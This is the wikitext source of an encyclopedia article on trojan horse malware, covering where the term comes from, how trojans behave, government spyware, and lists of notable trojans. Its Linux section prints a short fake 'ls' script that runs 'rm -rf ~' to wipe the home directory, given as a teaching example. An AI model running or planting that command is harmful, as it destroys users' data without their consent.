Editing Trojan horse (computing)

{{Short description|Type of malware}}{{About|the type of malware|the wooden horse in Greek mythology|Trojan Horse|other uses|Trojan Horse (disambiguation)}}

{{Use mdy dates|date=May 2018}}
{{Computer hacking}}
In [[computing]], a '''trojan horse''' (or simply '''trojan''';<ref name="Collins2020"/> often capitalized,<ref name="Gregg2015"/> but see below) is a kind of [[malware]] that misleads users as to its true intent by disguising itself as a normal program.

Trojans are generally spread by some form of [[social engineering (security)|social engineering]]. For example, a user may be duped into executing an [[email]] attachment disguised to appear innocuous (e.g., a routine form to be filled in), or into clicking on a fake advertisement on the [[Internet]]. Although their payload can be anything, many modern forms act as a [[backdoor (computing)|backdoor]], contacting a controller who can then have unauthorized access to the affected device.<ref name="Broadcom2013"/> [[Ransomware]] attacks are often carried out using a trojan.

Unlike [[computer virus]]es and [[Computer worm|worms]], trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.<ref>{{Cite web
   |title = VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)
   |url = http://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
   |date = October 9, 1995
   |access-date = September 16, 2019
   |archive-date = August 5, 2020
   |archive-url = https://web.archive.org/web/20200805171304/https://faqs.cs.uu.nl/na-dir/computer-virus/faq.html
   |url-status = dead}}</ref>

==Origins of the term==
The term is derived from the [[Ancient Greece|ancient Greek]] story of the deceptive [[Trojan Horse]] that led to the fall of the city of [[Troy]].<ref name="Gregg2015"/>

It is unclear where and when the computing concept, and this term for it, originated; but by 1971 the first [[Unix]] manual assumed its readers knew both.<ref>{{cite web
   |last1=Thompson
   |first1=Ken
   |last2=Ritchie
   |first2=Dennis M.
   |title=Unix Programmer's Manual, November 3, 1971
   |url=https://www.bell-labs.com/usr/dmr/www/man21.pdf
   |page = 5
   |quote = Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.
   |access-date=28 March 2020}}</ref>

Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the [[Multics]] computer systems.<ref name="Karger1974"/>

The term "Trojan horse" was popularized by [[Ken Thompson]] in his 1983 [[Turing Award]] acceptance lecture "Reflections on Trusting Trust",<ref name="Thompson1984"/> subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software." He mentioned that he knew about the possible existence of trojans from a report on the security of Multics.<ref name="Karger2002"/><ref>Karger and Schell wrote that Thompson added this reference in a later version of his Turing conference speech: {{Citation|author = Ken Thompson|title = On Trusting Trust.
|journal = Unix Review|date = November 1989|volume = 7|number = 11|pages = 70–74}}</ref>

===Capitalization===
The computer term "Trojan horse" is derived from the legendary [[Trojan Horse]] of the ancient city of [[Troy]]. For this reason "Trojan" is often capitalized, especially in older sources. However, many modern [[style guide]]s<ref name="Microsoft2020"/> and dictionaries<ref name="Collins2020"/> suggest a lower-case "trojan" for this technical use.

==Behavior==
Once installed, trojans may perform a range of malicious actions. Many tend to contact one or more [[Botnet#Command and control|Command and Control]] (C2) servers across the Internet and await instruction. Since individual trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the trojan, using it as a proxy for malicious action.<ref name="Crapanzano2003"/>

In German-speaking countries, [[spyware]] used or made by the government is sometimes called ''govware''. Govware is typically used to intercept communications from the target device. Some countries like Switzerland and Germany have a legal framework governing the use of such software.<ref name="cupa">Basil Cupa, [http://www.zora.uzh.ch/81157/1/Cupa_Living_in_Surveillance_Societies_2012.pdf Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)], LISS 2013, pp. 419–428</ref><ref>{{cite web
   |url=http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html
   |title=Häufig gestellte Fragen (Frequently Asked Questions)| publisher=Federal Department of Justice and Police
   |url-status=dead
   |archive-url=https://web.archive.org/web/20130506102113/http://www.ejpd.admin.ch/content/ejpd/de/home/themen/sicherheit/ueberwachung_des_post-/faq_vuepf.faq_3.html| archive-date=May 6, 2013}}</ref> Examples of govware trojans include the Swiss [[MiniPanzer and MegaPanzer]]<ref name="tech">{{cite web
   |last1=Dunn
   |first1=John
   |title=Swiss coder publicises government spy Trojan
   |url=http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/
   |website=[[International Data Group|TechWorld]]
   |access-date=10 January 2021|archive-url=https://archive.today/20140126115729/http://news.techworld.com/security/3200593/swiss-coder-publicises-government-spy-trojan/
   |archive-date=26 January 2014
   |date=27 August 2009
   |url-status=dead}}{{cbignore|bot=InternetArchiveBot}}</ref> and the [[Staatstrojaner|German "state trojan" nicknamed R2D2]].<ref name="cupa"/> German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications.<ref>{{Cite web
   |title = German federal police use trojan virus to evade phone encryption
   |url = http://www.dw.com/en/german-federal-police-use-trojan-virus-to-evade-phone-encryption/a-42328466
   |website = [[Deutsche Welle|DW]]
   |access-date = 2018-04-14}}</ref>

Due to the popularity of [[Botnet|botnets]] among hackers and the availability of advertising services that permit authors to violate their users' privacy, trojans are becoming more common. According to a survey conducted by [[Bitdefender|BitDefender]] from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them.<ref name="Bitdefender2009"/> BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a trojan infection.<ref name="Datta2014"/>

Recent investigations have revealed that the trojan-horse method has been used as an attack on [[cloud computing]] systems. A trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system.<ref>{{Cite journal |last1=Kanaker |first1=Hasan |last2=Karim |first2=Nader Abdel |last3=Awwad |first3=Samer A. B. |last4=Ismail |first4=Nurul H. A. |last5=Zraqou |first5=Jamal |last6=Ali |first6=Abdulla M. F. Al |date=2022-12-20 |title=Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning |url=https://online-journals.org/index.php/i-jim/article/view/35763 |journal=International Journal of Interactive Mobile Technologies |language=en |volume=16 |issue=24 |pages=81–106 |doi=10.3991/ijim.v16i24.35763 |issn=1865-7923|doi-access=free }}</ref>

==Linux ls example==
A trojan horse is a [[Computer program|program]] that purports to perform some legitimate function, yet upon execution it compromises the user's security.<ref name="Wood1985"/> One simple example<ref name="CETS2023"/> is the following malicious version of the Linux [[ls]] command. An attacker would place this executable script in a publicly writable and "high-traffic" location (e.g., <code>/tmp/ls</code>). Then, any victim who tried to run <code>ls</code> from that directory — ''if and only if'' the victim's executable search <code>PATH</code> unwisely<ref name="CETS2023"/> included the current directory <code>.</code> — would execute <code>/tmp/ls</code> instead of <code>/usr/bin/ls</code>, and have their home directory deleted.
<syntaxhighlight lang="sh">
#!/usr/bin/env bash
rm -rf ~ 2>/dev/null # Remove the user's home directory, then remove self.
rm $0
</syntaxhighlight>
Similar scripts could hijack other common commands; for example, a script purporting to be the [[sudo]] command (which prompts for the user's password) could instead mail that password to the attacker.<ref name="Wood1985"/>

In these examples, the malicious program imitates the name of a well-known useful program, rather than pretending to be a novel and unfamiliar (but harmless) program. As such, these examples also resemble [[typosquatting]] and [[supply chain attack]]s.

==Notable examples==
===Private and governmental===
* [[ANOM]] – FBI
* [[Chaos Computer Club#Staatstrojaner affair|0zapftis / r2d2 StaatsTrojaner]] – DigiTask
* [[FinFisher]] – Lench IT solutions / Gamma International 
* [[Hacking Team#Products and capabilities|DaVinci / Galileo RCS]] – HackingTeam
* [[Magic Lantern (spyware)|Magic Lantern]] – FBI
* [[2020 United States federal government data breach|SUNBURST]] – [[Foreign Intelligence Service (Russia)|SVR]]/[[Cozy Bear]] (suspected)
* [[Tailored Access Operations#QUANTUM attacks|TAO QUANTUM/FOXACID]] – NSA
* [[WARRIOR PRIDE]] – GCHQ

===Publicly available===
* [[EGABTR]] – late 1980s
* [[Netbus]] – 1998 (published)<ref name="Kulakow2001"/>
* [[Sub7]] by Mobman – 1999 (published)
* [[Back Orifice]] – 1998 (published)
* [[Y3K]] by Tselentis brothers – 2000 (published)
* [[Beast (Trojan horse)|Beast]] – 2002 (published)
* [[Bifrost (Trojan horse)|Bifrost Trojan]] – 2004 (published)
* [[DarkComet]] – 2008-2012 (published)
* [[Blackhole exploit kit]] – 2012 (published)
* [[Gh0st RAT]] – 2009 (published)
* [[MiniPanzer and MegaPanzer|MegaPanzer BundesTrojaner]] – 2009 (published)<ref name="MegaPanzer2016"/><ref name="MiniPanzer2016"/>
* [[MEMZ]] by Leurak – 2016 (published)

===Detected by security researchers===
* [[Twelve Tricks]] – 1990
* [[Clickbot.A]] – 2006 (discovered)
* [[Zeus (Trojan horse)|Zeus]] – 2007 (discovered)
* [[Trojan BackDoor.Flashback|Flashback Trojan]] – 2011 (discovered)
* [[ZeroAccess botnet|ZeroAccess]] – 2011 (discovered)
* [[Koobface]] – 2008 (discovered)
* [[Vundo]] – 2009 (discovered)
* [[Coreflood]] – 2010 (discovered)
* [[Tiny Banker Trojan]] – 2012 (discovered)
* [[Wirelurker]] - 2014 (discovered)
* [[Shedun]] (Android malware) – 2015 (discovered)<ref name="Lookout2015"/><ref name="Neal2015"/><ref name="Bentley2015"/><ref>{{cite web
  |url=https://betanews.com/2015/11/05/shuanet-shiftybug-and-shedun-malware-could-auto-root-your-android/
  |title=Shuanet, ShiftyBug and Shedun malware could auto-root your Android
  |date=November 5, 2015}}</ref><ref>{{cite web |url=http://www.techtimes.com/articles/104373/20151109/new-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm
  |title=New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug
  |first=Tech
  |last=Times
  |date=November 9, 2015}}</ref><ref>{{cite web
  |url=https://arstechnica.com/security/2015/11/android-adware-can-install-itself-even-when-users-explicitly-reject-it/
  |title=Android adware can install itself even when users explicitly reject it
  |date=2015-11-19}}</ref>

==See also==
{{colbegin}}
* {{annotated link|Computer security}}
* {{annotated link|Cuckoo's egg (metaphor)}}
* {{annotated link|Cyber spying}}
* {{annotated link|Dancing pigs}}
* {{annotated link|Exploit (computer security)}}
* {{annotated link|Industrial espionage}}
* {{annotated link|Hardware Trojan}}
* {{annotated link|Phishing}}
* {{annotated link|Principle of least privilege}}
* {{annotated link|Privacy-invasive software}}
* {{annotated link|Remote administration}}
* {{annotated link|Remote administration software}}
* {{annotated link|Reverse connection}}
* {{annotated link|Rogue security software}}
* {{annotated link|Scammers}}
* {{annotated link|Technical support scam}}
* {{annotated link|Timeline of computer viruses and worms}}
* {{annotated link|Zombie (computer science)}}

{{colend}}

==References==
<references>
<ref name="Bentley2015">{{cite web |author=Michael Bentley |title=Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire |website=blog.lookout.com |url=https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |access-date=2016-04-08 |url-status=dead |archive-url=https://web.archive.org/web/20170219042903/https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |archive-date=2017-02-19}}</ref>

<ref name="Bitdefender2009">{{cite web |title=BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends |date=2009-08-03 |website=[[Bitdefender|BitDefender]] |url=http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |access-date=2020-03-27 |url-status=dead |archive-url=https://web.archive.org/web/20090808080907/http://news.bitdefender.com/NW1094-en--BitDefender-Malware-and-Spam-Survey-finds-E-Threats-Adapting-to-Online-Behavioral-Trends.html |archive-date=2009-08-08}}</ref>

<ref name="Broadcom2013">{{cite web |title=Difference between viruses, worms, and trojans |url=https://knowledge.broadcom.com/external/article?legacyId=tech98539 |website=Symantec Security Center |publisher=Broadcom Inc. |access-date=2020-03-29 |archive-url=https://archive.today/20130819122702/http://www.symantec.com/business/support/index?page=content&id=TECH98539#selection-3435.1-3585.1 |archive-date=2013-08-19 |url-status=live}}{{cbignore|bot=InternetArchiveBot}}</ref>

<ref name="CETS2023">{{cite web |url=https://cets.seas.upenn.edu/answers/dot-path.html |title=What's wrong with having '.' in your $PATH? |website=CETS Answers |publisher=University of Pennsylvania Computing and Educational Technology Services |access-date=2023-11-28}}</ref>

<ref name="Collins2020">{{cite web |title=trojan |url=https://www.collinsdictionary.com/dictionary/english/trojan |website=Collins Advanced Dictionary |access-date=2020-03-29}}</ref>

<ref name="Crapanzano2003">{{cite report |author=Jamie Crapanzano |title=Deconstructing SubSeven, the Trojan Horse of Choice |date=2003 |url=http://www.sans.org/reading_room/whitepapers/malicious/deconstructing_subseven_the_trojan_horse_of_choice_953 |publisher=[[SANS Institute]] |access-date=2021-05-10}}</ref>

<ref name="Datta2014">{{cite web |author=Ganesh Datta |title=What are Trojans? |url=http://securaid.com/windows/2014/08/what-are-trojans/ |work=SecurAid |archive-url=https://archive.today/20140812015643/http://securaid.com/windows/2014/08/what-are-trojans/ |archive-date=2014-08-12 |url-status=dead |date=2014-08-07 |access-date=2020-03-27}}</ref>

<ref name="Gregg2015">{{cite book |author=Michael Gregg |title=The Network Security Test Lab: A Step-by-Step Guide |entry=Backdoors and Trojans |publisher=Wiley |year=2015 |pages=338–340 |isbn=978-1-118-98705-6 |url=https://archive.org/details/networksecurityt0000greg/page/338 |access-date=2020-03-29 |quote=Unlike a virus or worm, Trojans cannot spread themselves.}}</ref>

<ref name="Karger1974">{{cite journal |author1=Paul A. Karger |author2=Roger R. Schell |title=Multics Security Evaluation: Vulnerability Analysis, ESD-TR-74-193 |journal=HQ Electronic Systems Division: Hanscom AFB, MA |volume=2 |date=June 1974 |url=http://csrc.nist.gov/publications/history/karg74.pdf |access-date=2017-12-24 |archive-url=https://web.archive.org/web/20110709024412/http://csrc.nist.gov/publications/history/karg74.pdf |archive-date=2011-07-09 |url-status=dead |at=4.2.1 |quote=...some sort of protection from user written applications programs that may contain "Trojan Horses" {{sic}}}}</ref>

<ref name="Karger2002">{{cite journal |author1=Paul A. Karger |author2=Roger R. Schell |title=Thirty Years Later: Lessons from the Multics Security Evaluation |journal=ACSAC |date=2002 |pages=119–126 |url=https://www.acsac.org/2002/papers/classic-multics.pdf}}</ref>

<ref name="Kulakow2001">{{cite report |author=Seth Kulakow |title=NetBus 2.1: Is It Still a Trojan Horse or an Actual Valid Remote Control Administration Tool? |url=https://www.sans.org/reading-room/whitepapers/malicious/netbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103 |publisher=[[SANS Institute]] |date=2001 |access-date=2021-05-10 |url-status=dead}}</ref>

<ref name="Lookout2015">{{cite web |title=Trojanized Adware Family Abuses Accessibility Service |website=Lookout.com |date=2015-11-19 |url=https://blog.lookout.com/blog/2015/11/19/shedun-trojanized-adware/}}</ref>

<ref name="MegaPanzer2016">{{cite web |author=orbitalsatelite |title=Mega-Panzer |website=SourceForge |date=2016-09-21 |url=https://sourceforge.net/projects/mega-panzer/}}</ref>

<ref name="Microsoft2020">{{cite encyclopedia |entry=trojan horse |title=Microsoft Style Guide |publisher=[[Microsoft]] |url=https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/t/trojan-horse-trojan |access-date=2020-03-29}}</ref>

<ref name="MiniPanzer2016">{{cite web |author=orbitalsatelite |title=Mini-Panzer |website=SourceForge |date=2016-09-18 |url=https://sourceforge.net/projects/mini-panzer/}}</ref>

<ref name="Neal2015">{{cite web |author=[[Dave Neal]] |title=Shedun trojan adware is hitting the Android Accessibility Service |date=2015-11-20 |url=http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |website=[[The Inquirer]] |publisher=Incisive Business Media |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20151122002729/http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |archive-date=2015-11-22 |url-status=unfit}}</ref>

<ref name="Thompson1984">{{cite journal |title=Reflection on Trusting Trust |author=[[Ken Thompson]] |journal=[[Communications of the ACM]] |volume=27 |number=8 |pages=761–763 |date=1984 |url=https://dl.acm.org/ft_gateway.cfm?id=1283940&type=pdf |doi=10.1145/358198.358210 |doi-access=free}}</ref>

<ref name="Wood1985">{{cite book |author1=Patrick H. Wood |author2=Stephen G. Kochan |title=UNIX System Security |publisher=Hayden Books |year=1985 |pages=42–43 |isbn=0-8104-6267-2}}</ref>
</references>

==Notes==
{{Notelist}}

==External links==
*{{Commonscatinline|Trojan horse (malware)}}
*{{cite web
  |title=CERT Advisory CA-1999-02 Trojan Horses
  |url=https://resources.sei.cmu.edu/asset_files/WhitePaper/1999_019_001_496184.pdf#page=14 
  |website=Carnegie Mellon University Software Engineering Institute
  |archive-url=https://web.archive.org/web/20001017172300/http://www.cert.org/advisories/CA-1999-02.html
  |archive-date=2000-10-17
  |access-date=15 September 2019
  |url-status=live}}

{{Malware}}
{{Information security}}{{Software distribution}}{{Authority control}}

{{DEFAULTSORT:Trojan Horse (Computing)}}
[[Category:Trojan horses| ]]
[[Category:Social engineering (security)]]
[[Category:Spyware]]
[[Category:Cyberwarfare]]
[[Category:Security breaches]]